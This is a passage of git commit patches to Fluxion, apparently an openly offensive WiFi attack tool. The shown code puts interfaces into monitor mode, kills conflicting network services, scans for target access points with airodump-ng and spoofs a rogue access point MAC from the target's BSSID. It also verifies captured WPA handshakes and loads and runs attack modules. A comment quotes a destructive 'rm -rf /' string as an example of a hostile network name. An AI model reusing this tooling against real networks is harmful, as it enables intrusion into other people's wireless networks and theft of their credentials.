you$CGrn gracefully stop the network manager$CClr or configure it to ignored the selected interface. Alternatively, run \"export FLUXIONWIKillProcesses=1\" before fluxion to kill it but we suggest you$CRed avoid using the killer flag${CClr}." FLUXIONGatheringWIInfoNotice="Gathering interface information..." FLUXIONUnknownWIDriverError="Unable to determine interface driver!" -FLUXIONUnloadingWIDriverNotice="Waiting for interface \"\$wiSelected\" to unload..." -FLUXIONLoadingWIDriverNotice="Waiting for interface \"\$wiSelected\" to load..." +FLUXIONUnloadingWIDriverNotice="Waiting for interface \"\$interface\" to unload..." +FLUXIONLoadingWIDriverNotice="Waiting for interface \"\$interface\" to load..." FLUXIONFindingConflictingProcessesNotice="Looking for notorious services..." FLUXIONKillingConflictingProcessesNotice="Killing notorious services..." FLUXIONPhysicalWIDeviceUnknownError="${CRed}Unable to determine interface's physical device!" FLUXIONStartingWIMonitorNotice="Starting monitor interface..." -FLUXIONMonitorModeWIEnabledNotice="${CGrn}Interface monitor mode enabled." -FLUXIONMonitorModeWIFailedError="${CRed}Interface monitor mode failed!" +FLUXIONInterfaceAllocatedNotice="${CGrn}Interface allocation succeeded!" +FLUXIONInterfaceAllocationFailedError="${CRed}Interface reservation failed!" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONStartingScannerNotice="Starting scanner, please wait..." FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the FLUXION Scanner." diff --git a/lib/InterfaceUtils.sh b/lib/InterfaceUtils.sh index 75a8ed9..ab7b2a6 100755 --- a/lib/InterfaceUtils.sh +++ b/lib/InterfaceUtils.sh @@ -11,22 +11,20 @@ if [ -d /sys/bus/usb ] # && hash lsusb; then InterfaceUSBBus=1 fi -if [ -d /sys/bus/pci ] || [ -d /sys/bus/pci_express ] || [ -d /proc/bus/pci ] # && hash lspci; +if [ -d /sys/bus/pci -o -d /sys/bus/pci_express -o -d /proc/bus/pci ] # && hash lspci; then InterfacePCIBus=1 fi # Checks if the interface belongs to a physical device. function interface_is_real() { - if [ -d /sys/class/net/$1/device ]; then return 0 - else return 1 - fi + test -d /sys/class/net/$1/device + return $? } # Checks if the interface belongs to a wireless device. function interface_is_wireless() { - if grep -qs "DEVTYPE=wlan" /sys/class/net/$1/uevent; then return 0 - else return 1 - fi + grep -qs "DEVTYPE=wlan" /sys/class/net/$1/uevent + return $? } # Returns an array of absolutely all interfaces. @@ -146,16 +144,41 @@ function interface_state() { function interface_set_state() { if [ "${#@}" -ne 2 ]; then return 1; fi + # TODO: Add alternatives to 'ip' in case of failure. ip link set "$1" "$2" + return $? } function interface_set_mode() { if [ "${#@}" -ne 2 ]; then return 1; fi if ! interface_set_state "$1" "down"; then return 2; fi - if ! iwconfig "$1" mode "$2" &>$InterfaceUtilsOutputDevice; then return 3; fi + if ! iw dev "$1" set type "$2" &> $InterfaceUtilsOutputDevice; then + if ! iwconfig "$1" mode "$2" &> $InterfaceUtilsOutputDevice + then return 3 + fi + fi if ! interface_set_state "$1" "up"; then return 4; fi } +function interface_reidentify() { + if [ ${#@} -ne 2 ]; then return 1; fi + + local -r __interface_reidentify__oldIdentifier=$1 + local -r __interface_reidentify__newIdentifier=$2 + + if [[ $__interface_reidentify__newIdentifier == *" "* ]] + then return 2 + fi + + if ! interface_set_state $__interface_reidentify__oldIdentifier down + then return 3 + fi + + # TODO: Add alternatives to 'ip' in case of failure. + ip link set $__interface_reidentify__oldIdentifier name $__interface_reidentify__newIdentifier + return $? +} + function interface_prompt() { if [ -z "$1" -o -z "$2" ]; then return 1; fi From 7987e28b56613f7d737a070eefeec08997c64e07 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Fri, 5 Jan 2018 23:57:16 -0600 Subject: [PATCH 02/45] Refactored & implemented targetting subroutines. The majority of the algorithms are enhanced migrations from fluxion 3. These new subroutines are modular and stand independent from the script. --- fluxion | 193 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 193 insertions(+) diff --git a/fluxion b/fluxion index cd71421..d25116c 100755 --- a/fluxion +++ b/fluxion @@ -811,8 +811,201 @@ function fluxion_get_interface() { } +# ============== < Fluxion Target Subroutines > ============== # +# Parameters: interface [ channel(s) [ band(s) ] ] +# ------------------------------------------------------------ # +# Return 1: Missing monitor interface. +# Return 2: Xterm failed to start airmon-ng. +# Return 3: Invalid capture file was generated. +# Return 4: No candidates were detected. +function fluxion_get_target_candidates() { + # Assure a valid wireless interface for scanning was given. + if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi + + echo -e "$FLUXIONVLine $FLUXIONStartingScannerNotice" + echo -e "$FLUXIONVLine $FLUXIONStartingScannerTip" + + # Assure all previous scan results have been cleared. + sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" + + #if [ "$FLUXIONAuto" ]; then + # sleep 30 && killall xterm & + #fi + + # Begin scanner and output all results to "dump-01.csv." + if ! xterm -title "$FLUXIONScannerHeader" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e "airodump-ng -Mat WPA "${2:+"--channel $2"}" "${3:+"--band $3"}" -w \"$FLUXIONWorkspacePath/dump\" $1" 2> $FLUXIONOutputDevice; then + echo -e "$FLUXIONVLine$CRed $FLUXIONGeneralXTermFailureError" + sleep 5 + return 2 + fi + + # Sanity check the capture files generated by the scanner. + # If the file doesn't exist, or if it's empty, abort immediately. + if [ ! -f "$FLUXIONWorkspacePath/dump-01.csv" -o \ + ! -s "$FLUXIONWorkspacePath/dump-01.csv" ]; then + sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" + return 3 + fi + + # Syntheize scan operation results from output file "dump-01.csv." + echo -e "$FLUXIONVLine $FLUXIONPreparingScannerResultsNotice" + # WARNING: The code below may break with different version of airmon-ng. + # The times matching operator "{n}" isn't supported by mawk (alias awk). + # readarray FLUXIONTargetCandidates < <(gawk -F, 'NF==15 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) + # readarray FLUXIONTargetCandidatesClients < <(gawk -F, 'NF==7 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) + readarray FLUXIONTargetCandidates < <(awk -F, 'NF==15 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") + readarray FLUXIONTargetCandidatesClients < <(awk -F, 'NF==7 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") + + # Cleanup the workspace to prevent potential bugs/conflicts. + sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" + + if [ ${#FLUXIONTargetCandidates[@]} -eq 0 ]; then + echo -e "$FLUXIONVLine $FLUXIONScannerDetectedNothingNotice" + sleep 3 + return 4 + fi +} +function fluxion_get_target() { + # Assure a valid wireless interface for scanning was given. + if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi + + local choices=( \ + "$FLUXIONScannerChannelOptionAll (2.4GHz)" \ + "$FLUXIONScannerChannelOptionAll (5GHz)" \ + "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)" \ + "$FLUXIONScannerChannelOptionSpecific" "$FLUXIONGeneralBackOption" + ) + + io_query_choice "$FLUXIONScannerChannelQuery" choices[@] + + echo + + case "$IOQueryChoice" in + "$FLUXIONScannerChannelOptionAll (2.4GHz)") + fluxion_get_target_candidates $interface "" "bg";; + + "$FLUXIONScannerChannelOptionAll (5GHz)") + fluxion_get_target_candidates $interface "" "a";; + + "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)") + fluxion_get_target_candidates $interface "" "abg";; + + "$FLUXIONScannerChannelOptionSpecific") + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONScannerChannelQuery" + echo + echo -e " $FLUXIONScannerChannelSingleTip ${CBlu}6$CClr " + echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1-5$CClr " + echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1,2,5-7,11$CClr " + echo + echo -ne "$FLUXIONPrompt" + + local channels + read channels + + echo + + fluxion_get_target_candidates $interface $channels;; + + "$FLUXIONGeneralBackOption") + return -1;; + esac + + # Abort if errors occured while searching for candidates. + if [ $? -ne 0 ]; then return 2; fi + + local candidatesMAC=() + local candidatesClientsCount=() + local candidatesChannel=() + local candidatesSecurity=() + local candidatesSignal=() + local candidatesPower=() + local candidatesESSID=() + local candidatesColor=() + + # Gather information from all the candidates detected. + # TODO: Clean up this for loop using a cleaner algorithm. + # Maybe try using array appending & [-1] for last elements. + for candidateAPInfo in "${candidates[@]}"; do + # Strip candidate info from any extraneous spaces after commas. + candidateAPInfo=$(echo "$candidateAPInfo" | sed -r "s/,\s*/,/g") + + local i=${#candidatesMAC[@]} + + candidatesMAC[i]=$(echo "$candidateAPInfo" | cut -d , -f 1) + candidatesClientsCount[i]=$(echo "${candidatesClients[@]}" | grep -c "${candidatesMAC[i]}") + candidatesChannel[i]=$(echo "$candidateAPInfo" | cut -d , -f 4) + candidatesSecurity[i]=$(echo "$candidateAPInfo" | cut -d , -f 6) + candidatesPower[i]=$(echo "$candidateAPInfo" | cut -d , -f 9) + candidatesColor[i]=$([ ${candidatesClientsCount[i]} -gt 0 ] && echo $CGrn || echo $CClr) + + # Parse any non-ascii characters by letting bash handle them. + # Just escape all single quotes in ESSID and let bash's $'...' handle it. + local sanitizedESSID=$(echo "${candidateAPInfo//\'/\\\'}" | cut -d , -f 14) + candidatesESSID[i]=$(eval "echo \$'$sanitizedESSID'") + + local power=${candidatesPower[i]} + if [ $power -eq -1 ]; then + # airodump-ng's man page says -1 means unsupported value. + candidatesQuality[i]="??" + elif [ $power -le $FLUXIONNoiseFloor ]; then + candidatesQuality[i]=0 + elif [ $power -gt $FLUXIONNoiseCeiling ]; then + candidatesQuality[i]=100 + else + # Bash doesn't support floating point division, so I gotta work around it... + # The function is Q = ((P - F) / (C - F)); Q - quality, P - power, F - floor, C - Ceiling. + candidatesQuality[i]=$(((${candidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10))) + fi + done + + format_center_literals "WIFI LIST" + local -r headerTitle="$FormatCenterLiterals\n\n" + + format_apply_autosize "$CRed[$CSYel ** $CClr$CRed]$CClr %-*.*s %4s %3s %3s %2s %-8.8s %18s\n" + local -r headerFields=$(printf "$FormatApplyAutosize" "ESSID" "QLTY" "PWR" "STA" "CH" "SECURITY" "BSSID") + + format_apply_autosize "$CRed[$CSYel%03d$CClr$CRed]%b %-*.*s %3s%% %3s %3d %2s %-8.8s %18s\n" + io_query_format_fields "$headerTitle$headerFields" "$FormatApplyAutosize" \ + candidatesColor[@] \ + candidatesESSID[@] \ + candidatesQuality[@] \ + candidatesPower[@] \ + candidatesClientsCount[@] \ + candidatesChannel[@] \ + candidatesSecurity[@] \ + candidatesMAC[@] + + echo + + FLUXIONGetTargetMAC=${IOQueryFormatFields[7]} + FLUXIONGetTargetSSID=${IOQueryFormatFields[1]} + FLUXIONGetTargetChannel=${IOQueryFormatFields[5]} + + FLUXIONGetTargetEncryption=${IOQueryFormatFields[6]} + + FLUXIONGetTargetMakerID=${APTargetMAC:0:8} + FLUXIONGetTargetMaker=$( + macchanger -l | grep ${FLUXIONGetTargetMakerID,,} | cut -d ' ' -f 5- + ) + + # Sanitize network ESSID to make it safe for manipulation. + # Notice: Why remove these? Some smartass might decide to name their + # network "; rm -rf / ;". If the string isn't sanitized accidentally + # shit'll hit the fan and we'll have an extremly distressed user. + # Replacing ' ', '/', '.', '~', '\' with '_' + FLUXIONGetTargetSSIDClean=$( + echo "$FLUXIONGetTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' + ) + + # We'll change a single hex digit from the target AP's MAC address. + # This new MAC address will be used as the rogue AP's MAC address. + local -r rogueMACHex=$(printf %02X $((0x${APTargetMAC:13:1} + 1))) + FLUXIONGetTargetRogueMAC="${FLUXIONGetTargetMAC::13}${rogueMACHex:1:1}${FLUXIONGetTargetRogueMAC:14:4}" +} From 1613eec221ec2b5f9324c0c35367f8f550172f38 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Sat, 6 Jan 2018 22:21:37 -0600 Subject: [PATCH 03/45] Hash subroutines, attack subroutines, & bug fixes. Implemented modular hash and attack subroutines. Fixed minor bugs with script startup. --- fluxion | 388 ++++++++++++++++++++++++++++++++++++++++------- lib/HashUtils.sh | 85 ++++++----- 2 files changed, 375 insertions(+), 98 deletions(-) diff --git a/fluxion b/fluxion index d25116c..5efebbe 100755 --- a/fluxion +++ b/fluxion @@ -90,7 +90,7 @@ declare -r FLUXIONCLIArguments=$FLUXIONCLIArguments # ============= < Argument Loaded Configurables > ============ # eval set -- "$FLUXIONCLIArguments" # Set environment parameters. -[ "$1" ] && declare -r FLUXIONAuto=1 # Auto-mode if using CLI. +[ "$1" != "--" ] && declare -r FLUXIONAuto=1 # Auto-mode if using CLI. while [ "$1" != "--" ]; do case "$1" in @@ -275,7 +275,7 @@ function fluxion_shutdown() { # If allocated interfaces exist, deallocate them now. if [ ${#FluxionInterfaces[@]} -gt 0 ]; then echo -e "$FLUXIONVLine $FLUXIONRemovingExtraWINotice" - + local interface for interface in "${!FluxionInterfaces[@]}"; do # Only deallocate fluxion or airmon-ng created interfaces. @@ -343,7 +343,7 @@ if [ $FLUXIONDebug ] function fluxion_error_report() { echo "Exception caught @ line #$1" } - + then trap 'fluxion_error_report $LINENO' ERR fi @@ -473,38 +473,40 @@ function fluxion_done_reset() { function fluxion_do_sequence() { if [ ${#@} -ne 2 ]; then return -1; fi - # TODO: Implement an alternative, better method of doing + # TODO: Implement an alternative, better method of doing # what this subroutine does, maybe using for-loop iteration. # The for-loop implementation must support the subroutines # defined above, including updating the namespace tracker. - local -r namespace=$1 - local -r sequence=("${!2}") + local -r __fluxion_do_sequence__namespace=$1 + local -r __fluxion_do_sequence__sequence=("${!2}") - if [ ${#sequence[@]} -eq 0 ]; then return -2; fi + if [ ${#__fluxion_do_sequence__sequence[@]} -eq 0 ]; then + return -2 + fi + + local -A __fluxion_do_sequence__index=() - local -A index=() - local i - for i in $(seq ${#sequence[@]}); do - index["${sequence[i-1]}"]=$i + for i in $(seq ${#__fluxion_do_sequence__sequence[@]}); do + __fluxion_do_sequence__index["${__fluxion_do_sequence__sequence[i-1]}"]=$i done - - local instruction=${sequence[0]} - while [ "$instruction" ]; do - if ! fluxion_do $namespace $instruction; then - if ! fluxion_undo $namespace + + local __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[0]} + while [ "$__fluxion_do_sequence__instruction" ]; do + if ! fluxion_do $__fluxion_do_sequence__namespace $__fluxion_do_sequence__instruction; then + if ! fluxion_undo $__fluxion_do_sequence__namespace then break fi fi - + if ! fluxion_done; then return -3; fi - - local instructionIndex=${index["$FluxionDone"]} - - if [ ! "$instructionIndex" ]; then return -4; fi - - instruction=${sequence["$instructionIndex"]} + + local __fluxion_do_sequence__instructionIndex=${__fluxion_do_sequence__index["$FluxionDone"]} + + if [ ! "$__fluxion_do_sequence__instructionIndex" ]; then return -4; fi + + __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence["$__fluxion_do_sequence__instructionIndex"]} done } @@ -577,10 +579,10 @@ declare -A FluxionInterfaces=() # Global interfaces' registry. function fluxion_deallocate_interface() { # Release interfaces if [ ! "$1" ] || ! interface_is_real $1; then return 1; fi - + local -r oldIdentifier=$1 local -r newIdentifier=${FluxionInterfaces[$oldIdentifier]} - + # Assure the interface is in the allocation table. if [ ! "$newIdentifier" ]; then return 2; fi @@ -588,13 +590,13 @@ function fluxion_deallocate_interface() { # Release interfaces # Unblock interfaces to make them available. echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice" rfkill unblock all &> $FLUXIONOutputDevice - + # Attempt deactivating monitor mode on the interface. if interface_set_mode $oldIdentifier managed then return 3 fi fi - + # If interface was allocated by airmon-ng, deallocate with it. if [[ "$oldIdentifier" == *"mon"* ]]; then if ! airmon-ng stop $oldIdentifier &> $FLUXIONOutputDevice @@ -622,14 +624,14 @@ function fluxion_allocate_interface() { # Reserve interfaces FluxionInterface=${FluxionInterfaces[$identifier]} return 0 fi - + echo -e "$FLUXIONVLine $FLUXIONAllocatingInterfaceNotice" - - if interface_is_wireless $identifier; then + + if interface_is_wireless $identifier; then # Unblock wireless interfaces to make them available. echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice" rfkill unblock all &> $FLUXIONOutputDevice - + if [ "$FLUXIONWIReloadDriver" ]; then # Get selected interface's driver details/info-descriptor. echo -e "$FLUXIONVLine $FLUXIONGatheringWIInfoNotice" @@ -656,10 +658,10 @@ function fluxion_allocate_interface() { # Reserve interfaces if [ "$FLUXIONWIKillProcesses" ]; then # Get list of potentially troublesome programs. echo -e "$FLUXIONVLine $FLUXIONFindingConflictingProcessesNotice" - + # Kill potentially troublesome programs. echo -e "$FLUXIONVLine $FLUXIONKillingConflictingProcessesNotice" - + # TODO: Make the loop below airmon-ng independent. # Maybe replace it with a list of network-managers? # WARNING: Version differences could break code below. @@ -678,7 +680,7 @@ function fluxion_allocate_interface() { # Reserve interfaces do sleep 1 done fi - + # Set wireless flag to prevent having to re-query. local -r allocatingWirelessInterface=1 fi @@ -687,13 +689,13 @@ function fluxion_allocate_interface() { # Reserve interfaces # If usuing airmon-ng, let airmon-ng rename the interface. if [ ! $FLUXIONAirmonNG ]; then echo -e "$FLUXIONVLine $FLUXIONReidentifyingInterface" - + if [ $allocatingWirelessInterface ] # Prevent interface-snatching by renaming the interface. then interface_reidentify $identifier fluxwl${#FluxionInterfaces[@]} else interface_reidentify $identifier fluxet${#FluxionInterfaces[@]} fi - + if [ $? -ne 0 ] # If reidentifying failed, abort immediately. then return 3 fi @@ -702,13 +704,13 @@ function fluxion_allocate_interface() { # Reserve interfaces if [ $allocatingWirelessInterface ]; then # Activate wireless interface monitor mode and save identifier. echo -e "$FLUXIONVLine $FLUXIONStartingWIMonitorNotice" - + # TODO: Consider the airmon-ng flag is set, monitor mode is # already enabled on the interface being allocated, and the # interface identifier is something non-airmon-ng standard. # The interface could already be in use by something else. # Snatching or crashing interface issues could occur. - + # NOTICE: Conditionals below populate newIdentifier on success. if [ $FLUXIONAirmonNG ]; then local -r newIdentifier=$(airmon-ng start $identifier | grep "monitor .* enabled" | grep -oP "wl.*mon|mon[0-9]+") @@ -731,15 +733,15 @@ function fluxion_allocate_interface() { # Reserve interfaces sleep 3 return 4 fi - + # Register identifiers to allocation hash table. FluxionInterfaces[$newIdentifier]=$identifier FluxionInterfaces[$identifier]=$newIdentifier - + echo -e "$FLUXIONVLine $FLUXIONInterfaceAllocatedNotice" sleep 3 - - # Notice: Interfaces are accessed with their original identifier + + # Notice: Interfaces are accessed with their original identifier # as the key for the global FluxionInterfaces hash/map/dictionary. } @@ -785,12 +787,12 @@ function fluxion_get_interface() { "$FLUXIONGeneralRepeatOption" \ "$FLUXIONGeneralBackOption" \ ) - + interfacesAvailableColor+=( \ "$CClr" \ "$CClr" \ ) - + format_apply_autosize "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" io_query_format_fields \ "$FLUXIONVLine $FLUXIONInterfaceQuery" "$FormatApplyAutosize" \ @@ -843,7 +845,7 @@ function fluxion_get_target_candidates() { # If the file doesn't exist, or if it's empty, abort immediately. if [ ! -f "$FLUXIONWorkspacePath/dump-01.csv" -o \ ! -s "$FLUXIONWorkspacePath/dump-01.csv" ]; then - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" + sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" return 3 fi @@ -870,14 +872,14 @@ function fluxion_get_target_candidates() { function fluxion_get_target() { # Assure a valid wireless interface for scanning was given. if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi - + local choices=( \ "$FLUXIONScannerChannelOptionAll (2.4GHz)" \ "$FLUXIONScannerChannelOptionAll (5GHz)" \ "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)" \ "$FLUXIONScannerChannelOptionSpecific" "$FLUXIONGeneralBackOption" ) - + io_query_choice "$FLUXIONScannerChannelQuery" choices[@] echo @@ -885,13 +887,13 @@ function fluxion_get_target() { case "$IOQueryChoice" in "$FLUXIONScannerChannelOptionAll (2.4GHz)") fluxion_get_target_candidates $interface "" "bg";; - - "$FLUXIONScannerChannelOptionAll (5GHz)") + + "$FLUXIONScannerChannelOptionAll (5GHz)") fluxion_get_target_candidates $interface "" "a";; - - "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)") + + "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)") fluxion_get_target_candidates $interface "" "abg";; - + "$FLUXIONScannerChannelOptionSpecific") fluxion_header @@ -909,14 +911,14 @@ function fluxion_get_target() { echo fluxion_get_target_candidates $interface $channels;; - + "$FLUXIONGeneralBackOption") return -1;; esac - + # Abort if errors occured while searching for candidates. if [ $? -ne 0 ]; then return 2; fi - + local candidatesMAC=() local candidatesClientsCount=() local candidatesChannel=() @@ -984,14 +986,14 @@ function fluxion_get_target() { FLUXIONGetTargetMAC=${IOQueryFormatFields[7]} FLUXIONGetTargetSSID=${IOQueryFormatFields[1]} FLUXIONGetTargetChannel=${IOQueryFormatFields[5]} - + FLUXIONGetTargetEncryption=${IOQueryFormatFields[6]} FLUXIONGetTargetMakerID=${APTargetMAC:0:8} FLUXIONGetTargetMaker=$( macchanger -l | grep ${FLUXIONGetTargetMakerID,,} | cut -d ' ' -f 5- ) - + # Sanitize network ESSID to make it safe for manipulation. # Notice: Why remove these? Some smartass might decide to name their # network "; rm -rf / ;". If the string isn't sanitized accidentally @@ -1007,9 +1009,279 @@ function fluxion_get_target() { FLUXIONGetTargetRogueMAC="${FLUXIONGetTargetMAC::13}${rogueMACHex:1:1}${FLUXIONGetTargetRogueMAC:14:4}" } +function fluxion_target_show() { + format_apply_autosize "%*s$CBlu%7s$CClr: %-32s%*s\n" + + local colorlessFormat="$FormatApplyAutosize" + local colorfullFormat=$(echo "$colorlessFormat" | sed -r 's/%-32s/%-32b/g') + + printf "$colorlessFormat" "" "ESSID" "\"${FLUXIONGetTargetSSID:-[N/A]}\" / ${FLUXIONGetTargetEncryption:-[N/A]}" "" + printf "$colorlessFormat" "" "Channel" "${FLUXIONGetTargetChannel:-[N/A]}" "" + printf "$colorfullFormat" "" "BSSID" "${FLUXIONGetTargetMAC:-[N/A]} ($CYel${FLUXIONGetTargetMaker:-[N/A]}$CClr)" "" + + echo +} +# =================== < Hash Subroutines > =================== # +# Parameters: [channel [encryption [maker]]] +function fluxion_hash_verify() { + if [ ${#@} -lt 3 ]; then return 1; fi + local -r hashPath=$1 + local -r hashBSSID=$2 + local -r hashESSID=$3 + local -r hashChannel=$4 + local -r hashEncryption=$5 + local -r hashMaker=$6 + + if [ ! -f "$hashPath" -o ! -s "$hashPath" ]; then + echo -e "$FLUXIONVLine $FLUXIONHashFileDoesNotExistError" + sleep 3 + return 2 + fi + + if [ "$FLUXIONAuto" ]; then + local -r verifier="pyrit" + else + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONHashVerificationMethodQuery" + echo + + fluxion_show_ap_info + "$hashESSID" \ + "$hashEncryption" \ + "$hashChannel" \ + "$hashBSSID" \ + "$hashMaker" + + local choices=( \ + "$FLUXIONHashVerificationMethodPyritOption" \ + "$FLUXIONHashVerificationMethodAircrackOption" \ + "$FLUXIONGeneralBackOption" \ + ) + + io_query_choice "" choices[@] + + echo + + case "$IOQueryChoice" in + "$FLUXIONHashVerificationMethodPyritOption") + local -r verifier="pyrit" ;; + + "$FLUXIONHashVerificationMethodAircrackOption") + local -r verifier="aircrack-ng" ;; + + "$FLUXIONGeneralBackOption") + return -1 ;; + esac + fi + + hash_check_handshake \ + "$verifier" \ + "$hashPath" \ + "$APTargetSSID" \ + "$APTargetMAC" + + local -r hashResult=$? + + # A value other than 0 means there's an issue with the hash. + if [ $hashResult -ne 0 ]; then + echo -e "$FLUXIONVLine $FLUXIONHashInvalidError" + else + echo -e "$FLUXIONVLine $FLUXIONHashValidNotice" + fi + + sleep 3 + + if [ $hashResult -ne 0 ]; then return 1; fi +} + +function fluxion_hash_unset_path() { + FluxionHashPath="" +} + +# Parameters: [channel [encryption [maker]]] +function fluxion_hash_set_path() { + if [ "$FluxionHashPath" ]; then return 0; fi + + fluxion_hash_unset_path + + local -r hashPath=$1 + + # If we've got a default path, check if a hash exists. + # If one exists, ask users if they'd like to use it. + if [ "$hashPath" -a -f "$hashPath" -a -s "$hashPath" ]; then + local choices=( \ + "$FLUXIONUseFoundHashOption" \ + "$FLUXIONSpecifyHashPathOption" \ + "$FLUXIONHashSourceRescanOption" \ + "$FLUXIONGeneralBackOption" \ + ) + + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONFoundHashNotice" + echo -e "$FLUXIONVLine $FLUXIONUseFoundHashQuery" + echo + + io_query_choice "" choices[@] + + echo + + case "$IOQueryChoice" in + "$FLUXIONUseFoundHashOption") + FluxionHashPath=$hashPath + return ;; + + "$FLUXIONHashSourceRescanOption") + fluxion_hash_set_path "$hashPath" + return $? ;; + + "$FLUXIONGeneralBackOption") + return -1 ;; + esac + fi + + while [ ! "$FluxionHashPath" ]; do + fluxion_header + + echo + echo -e "$FLUXIONVLine $FLUXIONPathToHandshakeFileQuery" + echo -e "$FLUXIONVLine $FLUXIONPathToHandshakeFileReturnTip" + echo + echo -ne "$FLUXIONAbsolutePathInfo: " + read FluxionHashPath + + # Back-track when the user leaves the hash path blank. + # Notice: Path is cleared if we return, no need to unset. + if [ ! "$FluxionHashPath" ]; then return -1; fi + + # Make sure the path points to a valid generic file. + if [ ! -f "$FluxionHashPath" -o ! -s "$FluxionHashPath" ]; then + echo -e "$FLUXIONVLine $FLUXIONEmptyOrNonExistentHashError" + sleep 5 + fluxion_hash_unset_path + fi + done +} + +# Paramters: +function fluxion_hash_get() { + # Assure we've got the bssid and the essid passed in. + if [ ${#@} -lt 2 ]; then return 1; fi + + if ! fluxion_hash_set_path "$1"; then return $?; fi + + # TODO: People are gonna bitch about this, I can already tell: + # "The back button isn't taking me back!" So yeah, fix this. + if ! fluxion_hash_verify "$@"; then return $?; fi + + # Copy to hash file to workspace for operations. + cp "$APTargetHashPath" "$hashPath" +} + + +# ================== < Attack Subroutines > ================== # +function fluxion_unset_attack() { + FluxionAttack="" +} + +function fluxion_set_attack() { + if [ "$FluxionAttack" ]; then return 0; fi + + fluxion_unset_attack + + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONAttackQuery" + echo + + fluxion_target_show + + local attacks + readarray -t attacks < <(ls -1 attacks) + + local descriptions + readarray -t descriptions < <(head -n 3 attacks/*/language/$FLUXIONLanguage.sh | grep -E "^# description: " | sed -E 's/# \w+: //') + + local identifiers=() + + local attack + for attack in "${attacks[@]}"; do + local identifier="$(head -n 3 "attacks/$attack/language/$FLUXIONLanguage.sh" | grep -E "^# identifier: " | sed -E 's/# \w+: //')" + if [ "$identifier" ]; then identifiers+=("$identifier") + else identifiers+=("$attack") + fi + done + + attacks+=("$FLUXIONGeneralExitOption") + identifiers+=("$FLUXIONGeneralExitOption") + descriptions+=("") + + io_query_format_fields "" "\t$CRed[$CSYel%d$CClr$CRed]$CClr%0.0s $CCyn%b$CClr %b\n" attacks[@] identifiers[@] descriptions[@] + + echo + + if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralExitOption" ]; then + fluxion_shutdown + fi + + FluxionAttack=${IOQueryFormatFields[0]} +} + +function fluxion_unprep_attack() { + if type -t unprep_attack &> /dev/null; then + unprep_attack + fi + + return 1 # Trigger another undo since prep isn't significant. +} + +function fluxion_prep_attack() { + local -r path="$FLUXIONPath/attacks/$FluxionAttack" + + if [ ! -x "$path/attack.sh" ]; then return 1; fi + if [ ! -x "$path/language/$FLUXIONLanguage.sh" ]; then return 2; fi + + # Load attack and its corresponding language file. + # Notice: If the attack is a targetted attack, sourcing + # will define the constant FLUXIONAttackTargetted. + source "$path/language/$FLUXIONLanguage.sh" + source "$path/attack.sh" + + if ! prep_attack "$@"; then + fluxion_unprep_attack + return 1 + fi +} + +function fluxion_run_attack() { + start_attack + + local choices=( \ + "$FLUXIONSelectAnotherAttackOption" \ + "$FLUXIONGeneralExitOption" \ + ) + + io_query_choice \ + "`io_dynamic_output $FLUXIONAttackInProgressNotice`" choices[@] + + echo + + # IOQueryChoice is a global, meaning, its value is volatile. + # We need to make sure to save the choice before it changes. + local choice="$IOQueryChoice" + + stop_attack + + if [ "$choice" = "$FLUXIONGeneralExitOption" ]; then + fluxion_handle_exit + fi + + fluxion_unset_attack +} # ============================================================ # @@ -1041,7 +1313,7 @@ function fluxion_main() { while true # Fluxion's runtime-loop. do fluxion_do_sequence fluxion sequence[@] done - + fluxion_shutdown } diff --git a/lib/HashUtils.sh b/lib/HashUtils.sh index ab7fb9f..bfd9b2a 100755 --- a/lib/HashUtils.sh +++ b/lib/HashUtils.sh @@ -6,46 +6,45 @@ readonly HashUtilsVersion="1.0" HashOutputDevice="/dev/stdout" function hash_check_handshake() { - local handshakeVerifier=$1 - local handshakePath=$2 - local handshakeAPSSID=$3 - local handshakeAPMAC=$4 + local -r handshakeVerifier=$1 + local -r handshakePath=$2 + local -r handshakeAPSSID=$3 + local -r handshakeAPMAC=$4 - local analysis - local hashData + echo "Verifier Parameters: $handshakeVerifier, path $handshakePath, SSID \"$handshakeAPSSID\", MAC 